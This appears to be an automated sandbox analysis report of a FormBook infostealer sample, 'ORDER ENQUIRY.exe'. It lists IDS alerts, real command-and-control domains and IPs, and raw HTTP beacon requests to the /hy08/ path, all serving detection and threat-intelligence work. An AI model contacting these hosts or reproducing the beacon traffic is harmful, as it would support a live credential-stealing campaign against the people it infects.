Source:	Binary string: wntdll.pdbUGP source: ORDER ENQUIRY.exe, 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, colorcpl.exe, 00000005.00000003.2156878359.000000000450B000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000005.00000002.4551625588.0000000004860000.00000040.00001000.00020000.00000000.sdmp, colorcpl.exe, 00000005.00000003.2164752594.00000000046B7000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000005.00000002.4551625588.00000000049FE000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: ORDER ENQUIRY.exe, ORDER ENQUIRY.exe, 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, colorcpl.exe, colorcpl.exe, 00000005.00000003.2156878359.000000000450B000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000005.00000002.4551625588.0000000004860000.00000040.00001000.00020000.00000000.sdmp, colorcpl.exe, 00000005.00000003.2164752594.00000000046B7000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000005.00000002.4551625588.00000000049FE000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: gTwj.pdbSHA256 source: ORDER ENQUIRY.exe

Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 4x nop then jmp 07735905h	0_2_07735850
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 4x nop then pop ebx	3_2_00407B1A
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 4x nop then pop ebx	5_2_02877B1C

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2031412 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.5:49720 -> 154.221.68.229:80
Source: Network traffic	Suricata IDS: 2031449 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.5:49720 -> 154.221.68.229:80
Source: Network traffic	Suricata IDS: 2031453 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.5:49720 -> 154.221.68.229:80
Source: Network traffic	Suricata IDS: 2031412 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.5:49719 -> 199.59.243.227:80
Source: Network traffic	Suricata IDS: 2031449 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.5:49719 -> 199.59.243.227:80
Source: Network traffic	Suricata IDS: 2031453 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.5:49719 -> 199.59.243.227:80
Source: Network traffic	Suricata IDS: 2031412 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.5:49724 -> 151.101.0.119:80
Source: Network traffic	Suricata IDS: 2031449 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.5:49724 -> 151.101.0.119:80
Source: Network traffic	Suricata IDS: 2031453 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.5:49724 -> 151.101.0.119:80
Source: Network traffic	Suricata IDS: 2031412 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.5:49722 -> 3.33.130.190:80
Source: Network traffic	Suricata IDS: 2031412 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.5:49723 -> 154.197.185.220:80
Source: Network traffic	Suricata IDS: 2031449 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.5:49722 -> 3.33.130.190:80
Source: Network traffic	Suricata IDS: 2031453 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.5:49722 -> 3.33.130.190:80
Source: Network traffic	Suricata IDS: 2031449 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.5:49723 -> 154.197.185.220:80
Source: Network traffic	Suricata IDS: 2031453 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.5:49723 -> 154.197.185.220:80

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\explorer.exe	Network Connect: 199.59.243.227 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 154.221.68.229 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 23.227.38.74 80	Jump to behavior

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: www.avai66.xyz/hy08/

Performs DNS queries to domains with low reputation

Source:	DNS query: www.raidsa.xyz
Source:	DNS query: www.manhuafeifei.xyz
Source:	DNS query: www.horxncnt.xyz
Source:	DNS query: www.avai66.xyz

Source: global traffic	HTTP traffic detected: GET /hy08/?GxlX=76ARE7XQpOejeJ4AXgyv9+sF91x02cjLA3TRMrZhHEY9TEByi8vF89DJ/cM7klw0Rkk8&DVRXbd=tXIxBhEhlzJLR HTTP/1.1Host: www.wergol.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /hy08/?GxlX=7jBziBoNeaZ0YBYCWuyuiMj/CYrZJe3GZSyGqEoVCgHfq7+BCveVTDnkVKPyAZoe4JtD&DVRXbd=tXIxBhEhlzJLR HTTP/1.1Host: www.os9user.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /hy08/?GxlX=NioFYaTFIvMJJp+7ScZBWsfgKUzei2ToAwpis545Pph8LP+guwZTQ54AM67XLgRQsCTP&DVRXbd=tXIxBhEhlzJLR HTTP/1.1Host: www.mksport-app.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /hy08/?GxlX=30efH6i7Pz0nBTvTyaS27TzcwE/B1ZxvPeuscSnkTZUQOLn/CwAUU0gdfCR3da34oWtV&DVRXbd=tXIxBhEhlzJLR HTTP/1.1Host: www.raidsa.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /hy08/?GxlX=J+fUwLE1cqwAibtDCdy9vP1S8G5oesFXJDqwJASvo9tHD3nGP7GVc6KavM+iw+vNh4vC&DVRXbd=tXIxBhEhlzJLR HTTP/1.1Host: www.horxncnt.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /hy08/?GxlX=KVcwHz5T5zR/xh5veJhw4peaZs963mOOXmZZz4i4ompoXg80SoxOBoRtYZYOL4s8KZ+L&DVRXbd=tXIxBhEhlzJLR HTTP/1.1Host: www.flywatchsecurity.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

Source: Joe Sandbox View	IP Address: 199.59.243.227 199.59.243.227
Source: Joe Sandbox View	IP Address: 199.59.243.227 199.59.243.227
Source: Joe Sandbox View	IP Address: 23.227.38.74 23.227.38.74

Source: Joe Sandbox View	ASN Name: BODIS-NJUS BODIS-NJUS
Source: Joe Sandbox View	ASN Name: DXTL-HKDXTLTseungKwanOServiceHK DXTL-HKDXTLTseungKwanOServiceHK
Source: Joe Sandbox View	ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: Joe Sandbox View	ASN Name: AMAZONEXPANSIONGB AMAZONEXPANSIONGB

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: C:\Windows\explorer.exe

Code function: 4_2_10697F82 getaddrinfo,setsockopt,recv,

4_2_10697F82

Source: global traffic	HTTP traffic detected: GET /hy08/?GxlX=76ARE7XQpOejeJ4AXgyv9+sF91x02cjLA3TRMrZhHEY9TEByi8vF89DJ/cM7klw0Rkk8&DVRXbd=tXIxBhEhlzJLR HTTP/1.1Host: www.wergol.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /hy08/?GxlX=7jBziBoNeaZ0YBYCWuyuiMj/CYrZJe3GZSyGqEoVCgHfq7+BCveVTDnkVKPyAZoe4JtD&DVRXbd=tXIxBhEhlzJLR HTTP/1.1Host: www.os9user.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /hy08/?GxlX=NioFYaTFIvMJJp+7ScZBWsfgKUzei2ToAwpis545Pph8LP+guwZTQ54AM67XLgRQsCTP&DVRXbd=tXIxBhEhlzJLR HTTP/1.1Host: www.mksport-app.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /hy08/?GxlX=30efH6i7Pz0nBTvTyaS27TzcwE/B1ZxvPeuscSnkTZUQOLn/CwAUU0gdfCR3da34oWtV&DVRXbd=tXIxBhEhlzJLR HTTP/1.1Host: www.raidsa.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /hy08/?GxlX=J+fUwLE1cqwAibtDCdy9vP1S8G5oesFXJDqwJASvo9tHD3nGP7GVc6KavM+iw+vNh4vC&DVRXbd=tXIxBhEhlzJLR HTTP/1.1Host: www.horxncnt.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /hy08/?GxlX=KVcwHz5T5zR/xh5veJhw4peaZs963mOOXmZZz4i4ompoXg80SoxOBoRtYZYOL4s8KZ+L&DVRXbd=tXIxBhEhlzJLR HTTP/1.1Host: www.flywatchsecurity.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

Source: global traffic	DNS traffic detected: DNS query: www.wergol.com
Source: global traffic	DNS traffic detected: DNS query: www.os9user.com
Source: global traffic	DNS traffic detected: DNS query: www.mksport-app.com
Source: global traffic	DNS traffic detected: DNS query: www.raidsa.xyz
Source: global traffic	DNS traffic detected: DNS query: www.manhuafeifei.xyz
Source: global traffic	DNS traffic detected: DNS query: www.horxncnt.xyz
Source: global traffic	DNS traffic detected: DNS query: www.cttlca.click
Source: global traffic	DNS traffic detected: DNS query: www.flywatchsecurity.com
Source: global traffic	DNS traffic detected: DNS query: www.21556934.com
Source: global traffic	DNS traffic detected: DNS query: www.valo.games
Source: global traffic	DNS traffic detected: DNS query: www.avai66.xyz

Source: global traffic

HTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Tue, 01 Oct 2024 08:05:41 GMTContent-Type: text/html; charset=UTF-8Content-Length: 4514Connection: closeX-Frame-Options: SAMEORIGINReferrer-Policy: same-originCache-Control: max-age=15Expires: Tue, 01 Oct 2024 08:05:56 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Juvm0SPz3sAHG%2FBUT138ZSlgrVuD0SkVy1HOtfpCxsNHwst3jIY1Gw7vmUFRxncMYqglCz91MflmtJTsHRmOqWUnQyNLqAjFd7w4qYWs%2FwiEr60fOvuRMlHGszd6KVMM"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}Server-Timing: cfRequestDuration;dur=9.999752X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffX-Permitted-Cross-Domain-Policies: noneX-Download-Options: noopenServer: cloudflareCF-RAY: 8cbaf2f93d32188d-EWRData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 67 74 20 49 45 20 38 5d 3e 3c 21 2d 2d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 41 74 74 65 6e 74 69 6f 6e 20 52 65 71 75 69 72 65 64 21 20 7c 20 43 6c 6f 75 64 66 6c 61 72 65 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 Data Ascii: <!DOCTYPE html> <html class="no-js" lang="en-US"> <head><title>Attention Required! | Cloudflare</title><meta charset="UTF-8" /><meta http-equiv="C

Source: explorer.exe, 00000004.00000000.2114025669.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4556219779.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4556219779.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.2114025669.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
Source: explorer.exe, 00000004.00000000.2099752489.0000000000F13000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4550702238.0000000000F13000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.v
Source: explorer.exe, 00000004.00000000.2114025669.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4556219779.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4556219779.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.2114025669.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
Source: explorer.exe, 00000004.00000000.2114025669.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4556219779.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4556219779.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.2114025669.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
Source: explorer.exe, 00000004.00000000.2114025669.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4556219779.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4556219779.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.2114025669.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0
Source: explorer.exe, 00000004.00000000.2114025669.00000000099C0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4556219779.00000000099C0000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/DigiCertGlobalRootG2.crlhttp://crl4.digicert.com/Di
Source: explorer.exe, 00000004.00000002.4555698304.0000000008870000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000002.4555746089.0000000008890000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000002.4555114227.0000000007DC0000.00000002.00000001.00040000.00000000.sdmp	String found in binary or memory: http://schemas.micro
Source: explorer.exe, 00000004.00000003.3100358362.000000000353D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4552398722.0000000003540000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3100405627.0000000003544000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.21556934.com
Source: explorer.exe, 00000004.00000003.3100358362.000000000353D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4552398722.0000000003540000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3100405627.0000000003544000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.21556934.com/hy08/
Source: explorer.exe, 00000004.00000003.3100358362.000000000353D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4552398722.0000000003540000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3100405627.0000000003544000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.21556934.com/hy08/www.valo.games
Source: explorer.exe, 00000004.00000003.3100358362.000000000353D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4552398722.0000000003540000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3100405627.0000000003544000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.21556934.comReferer:
Source: explorer.exe, 00000004.00000003.3100426782.000000000C85F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.2117735583.000000000C81C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4562642663.000000000C81C000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.autoitscript.com/autoit3/J
Source: explorer.exe, 00000004.00000003.3100358362.000000000353D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4552398722.0000000003540000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3100405627.0000000003544000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.avai66.xyz
Source: explorer.exe, 00000004.00000003.3100358362.000000000353D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4552398722.0000000003540000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3100405627.0000000003544000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.avai66.xyz/hy08/
Source: explorer.exe, 00000004.00000003.3100358362.000000000353D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4552398722.0000000003540000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3100405627.0000000003544000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.avai66.xyz/hy08/www.cheaplaptops.biz
Source: explorer.exe, 00000004.00000003.3100358362.000000000353D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4552398722.0000000003540000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3100405627.0000000003544000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.avai66.xyzReferer:
Source: explorer.exe, 00000004.00000003.3100358362.000000000353D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4552398722.0000000003540000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3100405627.0000000003544000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.bodgion.xyz
Source: explorer.exe, 00000004.00000003.3100358362.000000000353D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4552398722.0000000003540000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3100405627.0000000003544000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.bodgion.xyz/hy08/
Source: explorer.exe, 00000004.00000003.3100358362.000000000353D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4552398722.0000000003540000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3100405627.0000000003544000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.bodgion.xyz/hy08/www.avai66.xyz
Source: explorer.exe, 00000004.00000003.3100358362.000000000353D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4552398722.0000000003540000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3100405627.0000000003544000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.bodgion.xyzReferer:
Source: explorer.exe, 00000004.00000003.3100358362.000000000353D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4552398722.0000000003540000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3100405627.0000000003544000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.btcrenaissance.net
Source: explorer.exe, 00000004.00000003.3100358362.000000000353D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4552398722.0000000003540000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3100405627.0000000003544000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.btcrenaissance.net/hy08/
Source: explorer.exe, 00000004.00000003.3100358362.000000000353D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4552398722.0000000003540000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3100405627.0000000003544000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.btcrenaissance.net/hy08/www.yc23w.top
Source: explorer.exe, 00000004.00000003.3100358362.000000000353D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4552398722.0000000003540000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3100405627.0000000003544000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.btcrenaissance.netReferer:
Source: explorer.exe, 00000004.00000003.3100358362.000000000353D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4552398722.0000000003540000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3100405627.0000000003544000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.cheaplaptops.biz
Source: explorer.exe, 00000004.00000003.3100358362.000000000353D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4552398722.0000000003540000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3100405627.0000000003544000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.cheaplaptops.biz/hy08/
Source: explorer.exe, 00000004.00000003.3100358362.000000000353D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4552398722.0000000003540000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3100405627.0000000003544000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.cheaplaptops.biz/hy08/www.btcrenaissance.net
Source: explorer.exe, 00000004.00000003.3100358362.000000000353D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4552398722.0000000003540000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3100405627.0000000003544000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.cheaplaptops.bizReferer:
Source: explorer.exe, 00000004.00000003.3100358362.000000000353D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4552398722.0000000003540000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3100405627.0000000003544000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.cttlca.click
Source: explorer.exe, 00000004.00000003.3100358362.000000000353D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4552398722.0000000003540000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3100405627.0000000003544000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.cttlca.click/hy08/
Source: explorer.exe, 00000004.00000003.3100358362.000000000353D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4552398722.0000000003540000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3100405627.0000000003544000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.cttlca.click/hy08/www.flywatchsecurity.com
Source: explorer.exe, 00000004.00000003.3100358362.000000000353D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4552398722.0000000003540000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3100405627.0000000003544000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.cttlca.clickReferer:
Source: explorer.exe, 00000004.00000003.3100358362.000000000353D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4552398722.0000000003540000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3100405627.0000000003544000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.flywatchsecurity.com
Source: explorer.exe, 00000004.00000003.3100358362.000000000353D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4552398722.0000000003540000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3100405627.0000000003544000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.flywatchsecurity.com/hy08/
Source: explorer.exe, 00000004.00000003.3100358362.000000000353D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4552398722.0000000003540000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3100405627.0000000003544000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.flywatchsecurity.com/hy08/www.21556934.com
Source: explorer.exe, 00000004.00000003.3100358362.000000000353D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4552398722.0000000003540000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3100405627.0000000003544000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.flywatchsecurity.comReferer:
Source: ORDER ENQUIRY.exe	String found in binary or memory: http://www.google.com
Source: explorer.exe, 00000004.00000003.3100358362.000000000353D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4552398722.0000000003540000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3100405627.0000000003544000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.hemcksqa.net
Source: explorer.exe, 00000004.00000003.3100358362.000000000353D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4552398722.0000000003540000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3100405627.0000000003544000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.hemcksqa.net/hy08/
Source: explorer.exe, 00000004.00000002.4552398722.0000000003540000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.hemcksqa.net/hy08/A
Source: explorer.exe, 00000004.00000003.3100358362.000000000353D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3100405627.0000000003544000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.hemcksqa.net/hy08/j
Source: explorer.exe, 00000004.00000003.3100358362.000000000353D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4552398722.0000000003540000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3100405627.0000000003544000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.hemcksqa.netReferer:
Source: explorer.exe, 00000004.00000003.3100358362.000000000353D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4552398722.0000000003540000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3100405627.0000000003544000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.horxncnt.xyz
Source: explorer.exe, 00000004.00000003.3100358362.000000000353D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4552398722.0000000003540000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3100405627.0000000003544000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.horxncnt.xyz/hy08/
Source: explorer.exe, 00000004.00000003.3100358362.000000000353D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4552398722.0000000003540000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3100405627.0000000003544000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.horxncnt.xyz/hy08/www.cttlca.click
